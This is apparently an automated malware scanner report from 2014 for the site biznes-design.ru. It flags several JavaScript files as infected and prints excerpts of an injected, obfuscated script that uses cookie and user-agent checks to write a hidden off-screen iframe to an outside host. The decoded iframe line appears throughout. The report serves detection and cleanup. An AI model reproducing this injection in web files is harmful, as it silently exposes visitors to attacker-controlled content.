
Malware Scanner report for biznes-design.ru

Malicious/Suspicious/Total URLs checked
4/5/15
9 pages have malicious or suspicious code. See details below.
Blacklists
Found
The website is marked by Google as suspicious.

The website "biznes-design.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
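Malicious/Hidden/Total iFrames
0/0/0
(This count apparently covers only iframes present in the page markup; the iframe produced by the infected scripts is reported per file under "Scanned pages/files" below.)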
Deface / Content modification
OK


Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=biznes-design.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request | Server response | Status
http://biznes-design.ru/
200 OK
Content-Length: 32711
Content-Type: text/html
clean
http://biznes-design.ru/media/system/js/mootools-core.js
200 OK
Content-Length: 112123
Content-Type: application/x-javascript
clean
http://biznes-design.ru/media/system/js/core.js
200 OK
Content-Length: 20545
Content-Type: application/x-javascript
suspicious
Suspicious code: the script contains code that produces an iframe (excerpt and decoded output below).

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch
...[3797 bytes skipped]...

Decoded script (the iframe is positioned 1800px off-screen, so it is not visible to the visitor):


<iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe>

http://biznes-design.ru/media/system/js/mootools-more.js
200 OK
Content-Length: 15691
Content-Type: application/x-javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch
...[1490 bytes skipped]...

Decoded script:


<iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe>

http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js
200 OK
Content-Length: 85260
Content-Type: text/javascript
clean
http://biznes-design.ru/media/plg_jblibrary/jquery/jquery.noconflict.js
200 OK
Content-Length: 15706
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1
... 962 bytes are skipped ...
e = getCookie('tu'+'ge'+'ne'+'13'+'ve'+'ca1'+'ka'+'a9');
if (cookie == undefined) {
setCookie('tu'+'ge'+'ne'+'13'+'ve'+'ca1'+'ka'+'a9', true, 86400);
document.write('<i'+'f'+'ra'+'me'+' s'+'rc'+'='+'http://reactor.androidnoticia.com.br/?id=bill'+' s'+'t'+'y'+'l'+'e'+'='+'p'+'o'+'s'+'i'+'t'+'i'+'o'+'n'+':'+'a'+'b'+'s'+'o'+'l'+'u'+'t'+'e'+';'+'l'+'e'+'f'+'t'+':'+'-1800px;top:-1800px;'+' height="199" width="199">'+'</i'+'fr'+'ame>');
}
}
})();
$.noConflict();

Decoded script:


<iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.566

http://biznes-design.ru/media/plg_jblibrary/jquery/jquery.lazyload.js
200 OK
Content-Length: 17861
Content-Type: application/x-javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch
...[3723 bytes skipped]...

Decoded script:


<iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe>

http://biznes-design.ru/media/system/js/modal.js
200 OK
Content-Length: 25493
Content-Type: application/x-javascript
clean
http://biznes-design.ru/media/k2/assets/js/jquery-1.7.1.min.js
200 OK
Content-Length: 109629
Content-Type: application/x-javascript
clean
http://biznes-design.ru/components/com_k2/js/k2.js
200 OK
Content-Length: 22579
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1
... 3402 bytes are skipped ...
llerElement:first').outerWidth(true))*$K2('.k2Scroller').children('.k2ScrollerElement').length);
});
// Equal block heights for the "default" view
$K2(window).load(function () {
var blocks = $K2('.subCategory, .k2EqualHeights');
var maxHeight = 0;
blocks.each(function(){
maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height')));
});
blocks.css('height', maxHeight);
});
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Decoded script:


<iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe>

Antivirus reports:

DrWeb
SCRIPT.Virus

http://biznes-design.ru/templates/shaper_event/js/tools.js
200 OK
Content-Length: 17186
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1
... 2019 bytes are skipped ...
'left');
})
function sp_margin(container, dir){
if (typeof(dir)==='undefined') dir = 'right';
var rtl = document.getElement('.rtl');
if (rtl) {
if (dir==='right') {
dir = 'left';
} else {
dir = 'right';
}
}
var c_width = (window.getSize().x - document.getElements('.sp-wrap')[0].getWidth())/2;
document.id(container).setStyle('margin-' + dir, - c_width );
};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Decoded script:


<iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.566

http://biznes-design.ru/plugins/system/helix/js/menu.js
200 OK
Content-Length: 20582
Content-Type: application/x-javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch
...[3721 bytes skipped]...

Decoded script:

...[11752 bytes skipped]...
lect_box.injectInside(selector);document.getElements('ul.sp-menu a.menu-item').each(function(el){optText='&nbsp;'+el.get('text');optSub=el.getParents('ul').hasClass('sp-menu');len=optSub.length;dash;if(el.getParents('ul').hasClass('sp-menu')){dash=Array(len).join('&ndash;');optText=dash+optText}opt=new Element('option',{"value":el.href,"html":optText,"selected":el.href==window.location.href});opt.injectInside(select_box)})}});
<iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe>

http://biznes-design.ru/templates/shaper_event/js/totop.js
200 OK
Content-Length: 16737
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1
... 1530 bytes are skipped ...
0, transition: Fx.Transitions.linear}, window);
var a = document.id('topofpage'); if (a) {
a.set('opacity','0').setStyle('display','block');
window.addEvent('scroll',function(e) {
a.fade((window.getScroll().y > 300) ? 'in' : 'out')
});
var b = new Fx.Scroll(window);
a.addEvent('click', function (e) {
new Event(e).stop();
b.toTop()
})
}
});;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Decoded script:


<iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.566

http://biznes-design.ru/modules/mod_sptab/assets/js/sptab.js
200 OK
Content-Length: 19938
Content-Type: application/x-javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function barashkalo(){
var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Ch
...[3722 bytes skipped]...

Decoded script:

...[10058 bytes skipped]...
yle("top",-e+"px");b={top:[-e,0]}}else{this.items[a].setStyle("top",e+"px");b={top:[e,0]}}break}new Fx.Elements([this.items[g],this.items[a],this.items_mask],{duration:this.options.fxduration,transition:this.options.transition,onComplete:function(){this.running=false}.bind(this)}).start({"0":{display:'none'},"1":$merge({display:'block'},b),"2":{height:[e,this.options.autoHeight?this.items[a].getHeight():this.options.fixedHeight]}})}};
<iframe src=http://reactor.androidnoticia.com.br/?id=bill style=position:absolute;left:-1800px;top:-1800px; height="199" width="199"></iframe>

http://biznes-design.ru/PopIn.js
404 Not Found
Content-Length: 206
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: biznes-design.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 03:43:30 GMT
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Set-Cookie: 3f83f744190cbb4b99f87758800a53ef=55fef50ec4820365e91e19974b36f644; path=/
Set-Cookie: shaper_event_layout=category; expires=Fri, 26-Dec-2014 04:43:30 GMT; path=/
Set-Cookie: shaper_event_layout=category; expires=Fri, 26-Dec-2014 04:43:30 GMT; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: biznes-design.ru
Referer: http://www.google.com/search?q=biznes-design.ru

Result:
The result is similar to the first query. No suspicious redirects were found.